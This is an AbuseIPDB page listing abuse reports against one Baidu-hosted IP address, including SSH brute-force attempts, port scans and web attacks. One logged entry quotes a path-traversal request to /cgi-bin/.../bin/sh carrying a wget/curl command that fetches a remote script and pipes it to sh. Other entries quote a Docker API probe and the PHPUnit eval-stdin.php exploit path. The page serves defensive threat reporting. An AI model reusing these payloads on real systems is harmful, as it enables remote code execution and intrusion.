JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 106.13.122.198

106.13.122.198 was found in our database!

This IP was reported 278 times. Confidence of Abuse is 100%: ?

100%

ISP	Beijing Baidu Netcom Science and Technology Co., Ltd.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS38365
Domain Name	baidu.com
Country	🇨🇳 China
City	Beijing, Beijing

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 106.13.122.198

Whois 106.13.122.198

IP Abuse Reports for 106.13.122.198:

This IP address has been reported a total of 278 times from 149 distinct sources. 106.13.122.198 was first reported on April 29th 2026, and the most recent report was 1 hour ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇸🇪 KIDOS	2026-05-18 19:24:15 (2 weeks ago)	Apache monitor: web_attack_payload	Brute-Force SSH
🇵🇱 UMP-PL	2026-05-18 14:15:30 (2 weeks ago)	Webserver scan (backups, phpadmin, etc.)	Web App Attack
🇵🇱 pshost.pl	2026-05-18 08:27:54 (2 weeks ago)	2026-05-18T08:27:53.965Z, an unauthorized access attempt was detected on port 22 (SSH) from source I ... show more 2026-05-18T08:27:53.965Z, an unauthorized access attempt was detected on port 22 (SSH) from source IP address 106.13.122.198. show less	Port Scan Brute-Force SSH
🇺🇸 MPL	2026-05-18 08:01:30 (2 weeks ago)	tcp/2375 (2 or more attempts)	Port Scan
🇺🇸 donarev419	2026-05-18 03:57:01 (2 weeks ago)	Connection to port 2375 with data transfer. Data preview: GET /containers/json HTTP/1.1 Host: 67.21 ... show more Connection to port 2375 with data transfer. Data preview: GET /containers/json HTTP/1.1 Host: 67.215.244.172:2375 Upgrade-Insecure-Requests: 1 Accept: / show less	Port Scan Hacking
🇨🇳 ThreatBook.io	2026-05-17 22:47:29 (2 weeks ago)	ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/106.13.122.198 2026-05-1 ... show more ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/106.13.122.198 2026-05-17 15:30:19 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"(wget --no-check-certificate -qO- https://121.176.14.102/sh \|\| curl -sk https://121.176.14.102/sh) \| sh -s apache.selfrep","content_type":"text/plain","header":{"Accept":["/"],"Connection":["keep-alive"],"Content-Length":["121"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["libredtail-http"]},"host":"1.92.129.36:80","method":"POST","proto":"HTTP/1.1","remote_addr":"106.13.122.198:47770","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"libredtail-http"} show less	Web App Attack
🇺🇸 MPL	2026-05-17 19:29:27 (2 weeks ago)	tcp/2375 (4 or more attempts)	Port Scan
🇺🇸 MPL	2026-05-17 14:53:32 (2 weeks ago)	tcp/22 (2 or more attempts)	Port Scan
🇩🇪 Viveronese	2026-05-17 12:32:06 (2 weeks ago)	SSH brute force attacks	Brute-Force SSH
🇩🇪 Admins@FBN	2026-05-17 10:01:08 (2 weeks ago)	FW-PortScan: Traffic Blocked srcport=63523 dstport=2222	Port Scan
🇺🇸 Som1ght3n	2026-05-17 08:39:50 (2 weeks ago)	This IP attempted to exploit the PHPUnit vulnerability (CVE-2017-9841) by requesting `/vendor/phpuni ... show more This IP attempted to exploit the PHPUnit vulnerability (CVE-2017-9841) by requesting `/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`. show less	Hacking
🇺🇸 RAP	2026-05-17 08:17:49 (2 weeks ago)	2026-05-17 08:17:49 UTC Unauthorized activity to TCP port 22. SSH	SSH
🇺🇸 MPL	2026-05-17 02:54:19 (2 weeks ago)	tcp/23	Port Scan
🇬🇧 PeravixGroup	2026-05-17 00:39:51 (2 weeks ago)	Honeypot detection: SSH brute-force authentication attempt on port 22. Severity: MEDIUM. Aaran.cloud	SSH Brute-Force
🇨🇳 ThreatBook.io	2026-05-16 22:53:24 (2 weeks ago)	ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/106.13.122.198	SSH

Showing 136 to 150 of 278 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 216.180.246.174

🇺🇸 207.90.244.3

🇪🇸 196.196.150.124

🇮🇷 194.60.210.67

🇻🇪 190.97.228.132

🇩🇪 185.55.243.134

🇮🇳 117.194.98.34

🇳🇵 113.199.229.58

🇨🇳 111.26.6.111

🇪🇸 79.117.115.43

🇮🇳 66.116.205.19

🇸🇬 47.236.206.106

🇱🇹 45.84.205.234

🇺🇸 45.33.12.122

🇬🇧 35.203.210.250

🇬🇧 31.14.254.106

🇹🇼 1.170.210.226

🇮🇪 2a05:d018:10df:d402:bc79:aedf:9851:f503

🇮🇪 2a05:d018:10df:d400:961e:8272:4dd2:2fa9

🇭🇰 223.197.178.95